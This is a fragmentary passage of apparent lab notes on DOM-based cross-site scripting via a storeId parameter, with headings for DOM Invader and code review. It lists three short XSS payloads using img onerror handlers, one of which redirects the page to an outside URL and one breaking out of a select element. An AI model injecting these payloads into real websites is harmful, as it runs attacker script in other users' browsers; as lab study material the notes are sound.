DOM-Based
Basic



DOM Invader


Code Review


storeId parameter.
Last updated







storeId parameter.
Last updated
// the JavaScript payload used
<img src="x" onerror="prompt()">// the XSS payload used
<img src="x" onerror="window.location.href='https://x7331.gitbook.io/boxes'">// the JavaScipt payload used
</select><img src=x on error=alert()>